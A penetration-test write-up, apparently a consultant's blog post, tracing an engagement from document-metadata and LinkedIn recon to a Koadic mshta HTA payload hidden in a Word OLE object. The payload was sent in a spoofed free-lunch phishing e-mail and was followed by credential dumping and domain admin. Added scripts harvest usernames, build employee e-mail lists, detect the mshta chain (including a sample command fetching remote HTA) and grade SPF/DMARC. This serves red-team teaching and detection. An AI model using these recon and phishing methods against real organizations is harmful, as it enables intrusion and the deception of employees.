The goal was simple: see how exposed the organization is from an external standpoint and test the effectiveness of the security controls that are managed enterprise-wide. As such, apart from the company name, we were given "ZERO" information to carry out an external black-box penetration test.
This black-box external penetration test was performed for a client we will refer to as "Hackme".
We kicked off with some Open Source Intelligence (OSINT) 101 :). There are quite a lot of open source intelligence tools to help gather emails, subdomains, hosts, employee names and so on from public sources such as search engines and Shodan. There is an exhaustive list of such tools here.
Using quite a few open source intelligence tools, we obtained publicly available documents relating to the organization.
With Google dorks to the rescue, we ran some basic search strings such as: site:*.hackme.com ext:xls OR ext:docx OR ext:pptx
Of course, our goal was not to tirelessly search for documents. Rather, it was to work out the organization's naming schema by inspecting the metadata of those documents, which Office shows in the "Properties" section of the file (most notably for Microsoft Word, PowerPoint and Excel files). One can also use FOCA for this.
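The metadata the paragraph above refers to lives in a single XML part inside each Office file, so it can be pulled out without Office or FOCA. The script below is an added example, not code from the original post; the three documents it reads are constructed in memory with the same ZIP layout as a real .docx, and the heuristic for what "looks like an account name" is an assumption you would tune to the target.

```python
"""Read the author fields from Office documents' core properties.

Added example (not from the original post, and not FOCA). Office files
(.docx/.xlsx/.pptx) are ZIP archives, and the "Properties" pane reads
docProps/core.xml inside them. The three documents below are constructed
in memory with that same layout so the script runs offline; against real
targets you would feed it the files found with the Google dork.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}
# Lower-case single token such as "jdoe" or "j.doe"; a display name like "John Doe" does not match.
USERNAME_RE = re.compile(r"^[a-z][a-z.\-_']{1,30}$")


def core_properties(doc_bytes):
    """Return {"creator": ..., "lastModifiedBy": ...} from docProps/core.xml (empty if absent)."""
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
        if "docProps/core.xml" not in z.namelist():
            return {}
        root = ET.fromstring(z.read("docProps/core.xml"))
    props = {}
    for key, path in (("creator", "dc:creator"), ("lastModifiedBy", "cp:lastModifiedBy")):
        el = root.find(path, NS)
        if el is not None and el.text:
            props[key] = el.text.strip()
    return props


def looks_like_username(value):
    return bool(USERNAME_RE.match(value))


def harvest(docs):
    """Distinct metadata values across all documents that look like account names, in order seen."""
    found = []
    for doc in docs:
        for value in core_properties(doc).values():
            if looks_like_username(value) and value not in found:
                found.append(value)
    return found


def make_docx(creator, last_modified_by):
    """Build a minimal .docx-shaped ZIP containing only the core-properties part (constructed sample)."""
    core = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<cp:coreProperties xmlns:cp="{cp}" xmlns:dc="{dc}">'
        "<dc:creator>{c}</dc:creator><cp:lastModifiedBy>{m}</cp:lastModifiedBy>"
        "</cp:coreProperties>"
    ).format(cp=NS["cp"], dc=NS["dc"], c=creator, m=last_modified_by)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("docProps/core.xml", core)
    return buf.getvalue()


# Constructed samples: three "leaked" documents whose author fields mix usernames and display names.
SAMPLE_DOCS = [
    make_docx("jdoe", "John Doe"),
    make_docx("asmith", "asmith"),
    make_docx("Finance Team", "mbrown"),
]

if __name__ == "__main__":
    for name in harvest(SAMPLE_DOCS):
        print(name)
```

Run against a directory of downloaded files, the distinct usernames it prints are what reveal the convention (here "jdoe", "asmith", "mbrown" all read as first initial plus surname); the same docProps/app.xml part often carries the company name and template path too.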
From this, I noticed that employee emails followed a specific naming convention: the first letter of the first name followed by the surname, at the company domain (so a hypothetical John Doe would be jdoe@hackme.com).
Armed with this knowledge, we pulled the list of all current employees of Hackme from LinkedIn using the following Google dork syntax:
site:linkedin.com -inurl:dir "at Hackme" "Current". A typical example is shown in the screenshot, using Google Inc as a reference company.
By hacking together a script to automate the process, we copied out the first names, last names and roles of the current employees of Hackme.
A tiring approach is to manually crawl through the Google result pages in search of these names and roles; alternatively one can use GoogleScraper:
GoogleScraper -m http --keyword "site:linkedin.com -inurl:dir 'at Hackme' 'Current'" --num-pages-for-keyword 3 --output-filename output.json
Again, I leave the possibilities to your imagination, but you can easily convert this JSON output to a .csv file using https://json-csv.com/ or any other converter that works for you.
Then, using your favourite text editor (Word mail merge, Notepad++, etc.) or some scripting skills, merge first name and last name to form your email list.
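The merge step above is where scraped names get turned into addresses, and it is also where sloppy handling (accents, suffixes like "PhD", duplicate hits) produces bounces that tip off a mail admin. The script below is an added example, not the author's script; it assumes GoogleScraper's JSON output is a list of query objects each holding a "results" array with a "title" per hit (the records here are constructed, not real people), that LinkedIn titles have the "First Last - Role at Company | LinkedIn" shape, and that the domain is hackme.com.

```python
"""Turn scraped LinkedIn result titles into a target e-mail list.

Added example, not the original post's script. Assumed input shape: a
GoogleScraper JSON file, i.e. a list of query objects whose "results" entries
carry a "title". The records below are constructed samples in that shape (not
real people). The naming convention applied is the one inferred from
document metadata: first initial + surname @ hackme.com.
"""
import csv
import io
import json
import re
import unicodedata

DOMAIN = "hackme.com"  # assumed from the site: dork; substitute the real one
# "First Last - Role at Company | LinkedIn": name is everything before the first " - ".
TITLE_RE = re.compile(r"^(?P<name>.+?)\s+[-\u2013]\s+(?P<role>.*?)\s*(?:\|\s*LinkedIn)?\s*$")
SUFFIXES = {"jr", "sr", "ii", "iii", "phd", "mba", "cissp"}


def ascii_token(s):
    """Lower-case, strip accents and anything that is not a letter: 'Pérez-Gómez' -> 'perezgomez'."""
    s = unicodedata.normalize("NFKD", s).encode("ascii", "ignore").decode()
    return re.sub(r"[^a-z]", "", s.lower())


def split_name(full):
    """(first, last) from a display name; drops suffixes, keeps the last token as surname."""
    parts = [p for p in full.replace(",", " ").split() if ascii_token(p) not in SUFFIXES]
    if len(parts) < 2 or not ascii_token(parts[0]) or not ascii_token(parts[-1]):
        return None
    return parts[0], parts[-1]


def email_for(first, last, domain=DOMAIN):
    """Apply the convention learned from metadata: first initial + surname."""
    return f"{ascii_token(first)[0]}{ascii_token(last)}@{domain}"


def parse_title(title):
    m = TITLE_RE.match(title)
    if not m:
        return None
    name = split_name(m.group("name"))
    return (name, m.group("role")) if name else None


def build_targets(scraper_json):
    """Parse GoogleScraper-style JSON text into unique (first, last, role, email) rows."""
    rows, seen = [], set()
    for query in json.loads(scraper_json):
        for hit in query.get("results", []):
            parsed = parse_title(hit.get("title", ""))
            if not parsed:
                continue  # company pages and other non-profile hits
            (first, last), role = parsed
            addr = email_for(first, last)
            if addr in seen:
                continue  # the same profile is often returned on several pages
            seen.add(addr)
            rows.append((first, last, role, addr))
    return rows


def to_csv(rows):
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["first", "last", "role", "email"])
    writer.writerows(rows)
    return buf.getvalue()


# Constructed sample in the assumed GoogleScraper output shape (fictional people).
SAMPLE_JSON = json.dumps([{
    "query": "site:linkedin.com -inurl:dir 'at Hackme' 'Current'",
    "results": [
        {"title": "John Doe - Logistics Manager at Hackme | LinkedIn"},
        {"title": "Ana María Pérez-Gómez - HR Manager at Hackme | LinkedIn"},
        {"title": "Bob Lee, PhD - Data Scientist at Hackme | LinkedIn"},
        {"title": "John Doe - Logistics Manager at Hackme | LinkedIn"},
        {"title": "Hackme | LinkedIn"},
    ],
}])

if __name__ == "__main__":
    print(to_csv(build_targets(SAMPLE_JSON)), end="")
```

The role column is kept on purpose: it is what the later steps of this engagement use to pick the Logistics or HR Manager whose name goes on the signature.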
Feed our Target List a Payload
Since we are simulating a black-box penetration test, we decided (just as an attacker would) to gain code execution using malicious payloads. As such, we thought of creating a payload and sending it via email to employees of Hackme.
We also know that it is common practice for certain file types/extensions to be blocked by an organization's email filters, to limit exposure to risk.
This then brings us to Koadic C3 COM Command & Control, a very decent framework similar to Meterpreter or Empire.
What made it really stand out, aside from the nice interface, is that it lets one dump hashes, download/upload files, execute commands, bypass UAC, scan the local network for open SMB, pivot to another machine, load mimikatz and much more.
So we ran Koadic and set the required variables, using the "stager/js/mshta" module (which serves payloads in memory using MSHTA.exe HTML Applications).
The result was a spawned HTA payload URL, as shown in the screenshot. However, we need our targets to execute our payload as "mshta payload_url".
In recent years, HTA payloads have been used as a web attack vector and also to drop malware on a victim's PC. Now we need to get this payload past our victim's numerous defenses.
Here comes the tricky part: we needed a way to have the victim run "mshta payload_url" without our payload being spawned as a child process of mshta.exe, as we suspected this organization's blue team would flag that.
Luckily, we saw the tip from Matt Nelson, and interestingly, the team at NCC Group has this implemented in Demiguise.
So here is our final payload, saved as a .hta file.
The next step typically is to deliver our .hta payload as an embedded OLE object.
The intended attack scenario was:
- Send a Microsoft Word document with our .hta payload embedded as an OLE object.
- Get the user to open the Word document and the embedded OLE object.
- This spawns a new process and we get shell access to our victim's PC.
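Every step of that scenario leaves a process-creation record, which is exactly what the authors worried the blue team would catch. The script below is an added example, not from the original post or from Koadic: it expresses the defender's side of the chain as rules over Sysmon Event ID 1 style records. The events are constructed samples (the field names are Sysmon's, the paths and the 203.0.113.10 documentation-range address are made up), and the assumption that an activated package object launches the script host directly under the Office process is what the first rule encodes.

```python
"""Detection logic for the Word -> OLE package -> mshta.exe chain laid out above.

Added example (not from the original post or Koadic): the defender's view of
the attack scenario, written as rules over Sysmon Event ID 1 (process creation)
records. The events below are constructed samples carrying the fields Sysmon
emits (Image, ParentImage, CommandLine); the 203.0.113.10 address is from the
documentation range, not a real C2.
"""
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}


def image_name(path):
    """'C:\\Windows\\System32\\mshta.exe' -> 'mshta.exe'."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return the alert names that fire for one process-creation event (empty list when none)."""
    image = image_name(event.get("Image", ""))
    parent = image_name(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()
    alerts = []
    # An Office application should not be launching script hosts; an activated OLE package does.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        alerts.append("office_spawned_script_host")
    # mshta fetching an HTA over HTTP is the "mshta payload_url" stager pattern.
    if image == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
        alerts.append("mshta_remote_hta")
    # mshta running an .hta from a temp directory, where an embedded package gets extracted to.
    if image == "mshta.exe" and ".hta" in cmd and "\\temp\\" in cmd:
        alerts.append("mshta_hta_from_temp")
    # The behaviour the post's authors expected to be flagged: anything whose parent is mshta.exe.
    if parent == "mshta.exe":
        alerts.append("mshta_child_process")
    return alerts


def scan(events):
    """Run classify() over an event stream; return (index, alerts) pairs for the events that hit."""
    hits = []
    for i, event in enumerate(events):
        alerts = classify(event)
        if alerts:
            hits.append((i, alerts))
    return hits


# Constructed sample stream: the phishing chain surrounded by ordinary activity.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\jdoe\Downloads\Lunch Menu.docx"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Users\jdoe\AppData\Local\Temp\Lunch Menu.hta"'},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"rundll32.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta http://203.0.113.10:9999/abcd"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for index, alerts in scan(SAMPLE_EVENTS):
        print(index, image_name(SAMPLE_EVENTS[index]["Image"]), ", ".join(alerts))
```

Note that the parent/child rule and the command-line rules are independent on purpose: the trick the post describes (not having the payload appear as a child of mshta.exe) defeats only the last rule, while the Office-to-script-host parentage and the .hta-from-temp command line still fire for the delivery step itself.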
Now we get to the interesting part: we need our victim to open the Microsoft Word document and our payload.
To do that we need a very compelling story, simply because users are getting smarter. So we headed back to doing more recon.
…and more recon
We need to know more about Hackme, especially its culture and employee behaviour. The question we kept asking ourselves was "what would interest the employees?"
Where else to get this information than Glassdoor, a platform that gives you the inside scoop on companies through employee reviews about salaries, benefits, and the pros and cons of working for the company.
After poring through reviews of Hackme on Glassdoor, we found some common themes:
- Some employees felt mobility was an issue, as the office is quite a long distance from residential areas.
- Employees love the organization because they get free lunch.
As the old saying goes, the fastest way to a man's heart is through his stomach. So what better way to get the employees to open our payload-embedded Word document?
Send them an email telling them there is a change in the FREE LUNCH menu starting tomorrow.
Rather than send a random phishing email to employees that could be spotted easily, we decided a seemingly genuine email would be ideal, complete with a Hackme email signature and following the organization's email culture.
Now, how do we make our email more believable? By sending an email to Customer Service/Help Desk with a service request and observing the email signature in the response.
… recon again???
We headed back to LinkedIn to look for the name of either the HR Manager, Logistics Manager or Admin Manager (whichever is suitable) of Hackme. We carefully crafted an email signature with the name we chose.
We are halfway through sending our payload now. Have some patience and read on…
It's time to send our payload
From the metadata recon done earlier, we could tell what our target organization's document headers and footers looked like.
I then created a new Word document, similar to the one shown below, that was a spitting image of the Hackme document template with the appropriate headers/footers.
Then we embedded our .hta as an OLE object: Microsoft Word Document >> Insert >> Object >> Package. We changed the icon to Microsoft Word's icon and also changed the caption to reflect our message.
Don't Forget the Anti-virus!!!
To check the AV detection rate of our payload, and to see whether it would be flagged as malicious by Hackme's antivirus solution (if any), we did a quick AV scan on nodistribute.com. Nodistribute.com was used because, according to them, they do not distribute payload samples to AV companies. We scanned both the maldoc and the .hta file.
AV scan of our .hta payload (0 detections)
It's Time to Send our Email
If the target org has not configured SPF, DKIM and DMARC (in particular a DMARC policy of quarantine or reject, which is what makes receiving servers act on SPF/DKIM failures), one can simply spoof the HR Manager's, Logistics Manager's or Admin Manager's email address.
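The check behind that sentence is two TXT lookups and a little parsing. The script below is an added example, not from the original post: it grades SPF and DMARC records the way a tester would before deciding between outright spoofing and a look-alike Gmail account. The zone data is constructed for fictional .example domains so it runs offline; in a live check you would replace lookup() with a resolver query for the domain and for _dmarc.<domain>. DKIM is deliberately not graded: its records sit under <selector>._domainkey and cannot be enumerated without knowing the selector.

```python
"""Grade a domain's SPF/DMARC posture for spoofability of its From: addresses.

Added example, not from the original post. The records below are constructed
samples for fictional domains so the logic runs offline; in practice the two
inputs come from TXT lookups of "<domain>" and "_dmarc.<domain>".
"""
import re

# Constructed sample zone data: domain -> {record name: [TXT strings]}.
SAMPLE_TXT = {
    "hackme.example": {
        "hackme.example": ["v=spf1 include:_spf.google.com -all"],
        "_dmarc.hackme.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@hackme.example"],
    },
    "soft.example": {
        "soft.example": ["v=spf1 ip4:192.0.2.0/24 ~all"],
        "_dmarc.soft.example": ["v=DMARC1; p=none; rua=mailto:dmarc@soft.example"],
    },
    "open.example": {"open.example": ["v=spf1 +all"]},
    "nothing.example": {},
}


def lookup(zone, name):
    """Stand-in for a DNS TXT query; returns the list of TXT strings at `name`."""
    return zone.get(name, [])


def parse_spf(records):
    """Return the qualifier on the SPF 'all' term ('-', '~', '?', '+'), or None without an SPF record."""
    for txt in records:
        if txt.lower().startswith("v=spf1"):
            m = re.search(r"(?:^|\s)([-~?+]?)all(?:\s|$)", txt.lower())
            if not m:
                return "?"  # no 'all' term at all: unmatched senders get a neutral result
            return m.group(1) or "+"  # bare 'all' means '+all'
    return None


def parse_dmarc(records):
    """Return the DMARC policy ('none', 'quarantine' or 'reject'), or None without a DMARC record."""
    for txt in records:
        if txt.lower().startswith("v=dmarc1"):
            tags = dict(kv.strip().split("=", 1) for kv in txt.split(";") if "=" in kv)
            return tags.get("p", "none").strip().lower()  # p= is mandatory; treat a broken record as none
    return None


def spoofability(domain, zone):
    """'protected', 'likely_spoofable' or 'spoofable' for a message with From: someone@domain."""
    spf = parse_spf(lookup(zone, domain))
    dmarc = parse_dmarc(lookup(zone, "_dmarc." + domain))
    if dmarc in ("quarantine", "reject"):
        return "protected"  # receivers enforce alignment, so a forged visible From: is acted on
    if spf is None or spf in ("+", "?"):
        return "spoofable"  # no SPF, or SPF that lets any host pass or at best returns neutral
    # -all / ~all only covers the envelope sender; without an enforcing DMARC policy the
    # attacker uses their own domain in MAIL FROM and still forges the header From:.
    return "likely_spoofable"


if __name__ == "__main__":
    for name, zone in SAMPLE_TXT.items():
        print(f"{name:18} spf={parse_spf(lookup(zone, name))!s:4} "
              f"dmarc={parse_dmarc(lookup(zone, '_dmarc.' + name))!s:10} -> {spoofability(name, zone)}")
```

On a real engagement the two lookups are `dig +short TXT hackme.com` and `dig +short TXT _dmarc.hackme.com`; a "protected" result is what pushes an attacker toward the look-alike mailbox approach used in the next paragraph rather than direct spoofing.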
In this case, I created a Gmail account (yes, Gmail works too) using the Logistics Manager's first name and last name, and then spiced it up with his signature obtained earlier.
Let the shells in
Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!
The rest, as they say, is history. From here on, using the mimikatz modules, we escalated privileges, dumped hashes, scanned Hackme's local network, pivoted into other PCs, browsed the target's file systems and even became domain admins, etc.
All in all, this was a very fun engagement. While it may take an attacker a month, two months or a year of dedication to break into an organization through a loophole at the infrastructure level, it can be fairly easy to gain access by exploiting the human factor.
"Once you understand your target environment, devising a creative means of gaining access to the environment becomes fairly easy."
The moral of the exercise is: recon, recon and more recon. As a wise man once said:
"Give me six hours to chop down a tree and I will spend the first four sharpening the axe."
Rotimi Akinyele: Rotimi is an experienced Cybersecurity, IT Governance, Risk and Compliance (GRC) professional. He is an Assistant Manager, Cybersecurity at BDO UAE.